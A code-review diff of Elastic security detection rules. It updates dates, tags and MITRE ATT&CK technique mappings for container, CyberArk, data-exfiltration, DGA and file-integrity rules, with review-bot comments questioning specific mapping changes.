@@ -79,29 +71,24 @@ process.args like "http*:10250*" and process.interactive == true and container.i framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml index 37ebcaa3c19..10daf2c1993 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -62,15 +62,7 @@ references = [ risk_score = 21 rule_id = "ec604672-bed9-43e1-8871-cf591c052550" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -95,19 +87,6 @@ container.id like "?*" and not process.args == "-x" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" diff --git a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml index 674f355202d..64fe42e9846 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -54,15 +54,7 @@ references = [ risk_score = 47 rule_id = "cd24c340-b778-44bd-ab69-2f739bd70ce1" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -117,45 +109,22 @@ process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "Lua" - id = "T1059.011" - reference = "https://attack.mitre.org/techniques/T1059/011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
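Review bot: The rebuilt Execution entry keeps the T1059.006 Python and T1059.011 Lua sub-techniques but drops T1059.004 Unix Shell, and nothing in the hunk explains why shells are no longer in scope. If the query above the hunk (not shown here) still matches shell interpreters, the sub-technique should be restored as `id = "T1059.004"`, `name = "Unix Shell"`, `reference = "https://attack.mitre.org/techniques/T1059/004/"`. Moving the threat tables from the indented form to column 0 matches the other cloud_defend rules in this patch.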
diff --git a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml index f2710c97edc..118bdfd306b 100644 --- a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml +++ b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ references = [ risk_score = 21 rule_id = "f246e70e-5e20-4006-8460-d72b023d6adf" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -115,25 +106,35 @@ not process.name in ("apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [[rule.threat.technique]] id = "T1546" @@ -153,21 +154,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" 
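Review bot: T1037 Boot or Logon Initialization Scripts is removed from the Persistence entry here, while the echo/printf rule later in this patch gains T1037.004 RC Scripts for what looks like the same class of files. If the path list in this rule's query (outside the hunk) still covers rc or init scripts, keeping `T1037` (or narrowing it to `T1037.004`) would keep the two rules consistent. The added `T1053.002`, `T1053.006` and `T1543.002` sub-technique tables are well-formed and follow the id/name/reference order used elsewhere in the patch.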
@@ -182,21 +168,3 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml index a177a35115c..1458b7ed0b3 100644 --- a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml +++ b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,15 +60,7 @@ In containerized environments, SSH keys facilitate secure access, but adversarie risk_score = 47 rule_id = "f7769104-e8f9-4931-94a2-68fc04eadec3" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -94,31 +86,3 @@ reference = "https://attack.mitre.org/techniques/T1098/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml index 4e79c7957c8..379f019ead4 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
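Review bot: The whole Lateral Movement entry (T1021.004 SSH and T1563.001 SSH Hijacking) is dropped and the tags hunk above leaves only `"Tactic: Persistence"`, so the remaining T1098.004 mapping describes the file write but no longer records why a modified authorized_keys file matters. If the narrowing is deliberate (mapping the observed event rather than its downstream use) that is defensible, but any ATT&CK coverage view built from these mappings silently loses the SSH linkage, so the rationale belongs in the commit description. Otherwise restore at least `id = "T1021.004"` / `name = "SSH"` under a TA0008 entry and the matching tag.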
@@ -56,16 +56,7 @@ references = [ risk_score = 73 rule_id = "d9bfa475-270d-4b07-93cb-b1f49abe13da" severity = "high" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -86,9 +77,58 @@ process.args like ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] id = "T1053" @@ -100,11 +140,6 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" 
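Review bot: The new Command and Control entry maps this echo/printf rule to T1095 Non-Application Layer Protocol, which only holds if the `process.args` pattern above the hunk (not shown here) matches network-socket style redirections; if the query keys on writes to persistence paths instead, that entry and the `"Tactic: Command and Control"` tag added in the previous hunk over-map the rule. The same question applies to T1140 under Defense Evasion. The five `[[rule.threat]]` entries are now ordered alphabetically by tactic name, matching the tag order, which is a sensible convention to keep for the rest of the patch.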
@@ -124,39 +159,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml index eb31c917b85..03a60c061c0 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -51,16 +51,7 @@ This rule flags Linux container activity where a web server (or typical web-serv risk_score = 73 rule_id = "497a7091-0ebd-44d7-88c4-367ab4d4d852" severity = "high" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -237,29 +228,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
@@ -270,15 +238,38 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml index 92c6ca0ff81..6fa3c4dc37a 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -48,23 +48,3 @@ event.dataset:cyberarkpas.audit and event.type:error ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml index ae927878370..a57b73397a5 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,23 +51,3 @@ event.dataset:cyberarkpas.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml index cd93d27121e..1080888e570 100644 
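Review bot: Both promotion rules lose every `[[rule.threat]]` table here, but their `tags` arrays are outside these hunks; if they still carry `"Tactic: Privilege Escalation"` or `"Tactic: Initial Access"`, those tags now name tactics with no backing threat entry and will be the first thing a tags-versus-threat consistency check reports. The files also keep their `privilege_escalation_` path prefix with no tactic left to justify it. Since these are `promotion = true` rules that surface third-party alerts, dropping the mapping may well be intended, but the tags should be reconciled in the same commit.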
--- a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -44,13 +44,7 @@ The Data Exfiltration Detection integration detects data exfiltration activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Data Exfiltration Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Use Case: Data Exfiltration Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -89,14 +83,26 @@ Machine learning models analyze network traffic to identify anomalies, such as d - Implement enhanced monitoring on the affected system and network segment to detect any further suspicious activity.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - 
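Review bot: `"Tactic: Command and Control"` is inserted after the `Rule Type` tags here, whereas the cloud_defend hunks earlier in this patch move every `Tactic:` tag to the front of the array; one placement should be chosen for the whole patch. The new TA0011/T1571 entry itself is well-formed, the tag matches it, and the blank line now added between `framework` and the first technique is applied consistently across the ded files.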
diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml index 8e885a4b26b..fc59e19bd27 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ The detection rule leverages machine learning to identify anomalies in data tran - Consider deploying endpoint detection and response (EDR) solutions to enhance visibility and control over data movements to external devices.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml index d0c800d51aa..321ed5158e3 100644 --- a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 
@@ -89,14 +89,18 @@ In modern environments, processes may write data to external devices for legitim - Update security policies and controls to prevent similar exfiltration attempts, such as restricting process permissions to write to external devices and enhancing endpoint protection measures.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml index afcf159faef..411f171e203 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
@@ -96,14 +96,18 @@ Domain Generation Algorithms (DGAs) are used by malware to dynamically generate - Escalate to incident response team: If the threat is confirmed and widespread, escalate the incident to the organization's incident response team for further investigation and coordinated response efforts.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" +[[rule.threat.technique.subtechnique]] +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/fim/persistence_suspicious_file_modifications.toml b/rules/integrations/fim/persistence_suspicious_file_modifications.toml index 4ef9a45946f..98869db8820 100644 --- a/rules/integrations/fim/persistence_suspicious_file_modifications.toml +++ b/rules/integrations/fim/persistence_suspicious_file_modifications.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["fim"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -47,17 +47,7 @@ To configure the Elastic FIM integration, follow these steps: For more details on configuring the Elastic FIM integration, you can refer to the [Elastic FIM documentation](https://docs.elastic.co/integrations/fim). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: File Integrity Monitoring", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: File Integrity Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
